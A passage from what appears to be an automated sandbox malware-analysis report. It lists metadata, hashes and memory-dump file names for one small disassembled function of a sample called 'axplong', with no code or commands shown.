                      • Instruction ID: 95ef998c5db4fbaf80586e2cda9fc13584f3a956a2969aa737502b16dcc0441f
                      • Opcode Fuzzy Hash: 19ebc9a4d80d1a0ad21a8ae899238908c91a21c3f19e5eb1b1a78a459c2560c6
                      • Instruction Fuzzy Hash: EAF0E5B191024CA7C714FBE8D805D89B3ACDE15300B008A39F754E7601FBB8FA5487D1
                      Function 00792520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00792552
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#y$P#y
                      • API String ID: 2659868963-534735823
                      • Opcode ID: fb1a8b563a2af2d6a1e7423f53c30c018666e72562fff32c06d9da5882a9bd46
                      • Instruction ID: 1366827cc1e1db46879d58286cd9d5d3c960297e923dda537ec3b83734e79b20
                      • Opcode Fuzzy Hash: fb1a8b563a2af2d6a1e7423f53c30c018666e72562fff32c06d9da5882a9bd46
                      • Instruction Fuzzy Hash: 92F0A771E1120DEFCB14DFA8D841A9EBBF4AF59300F10C2AEE44467200EB745A95CBD9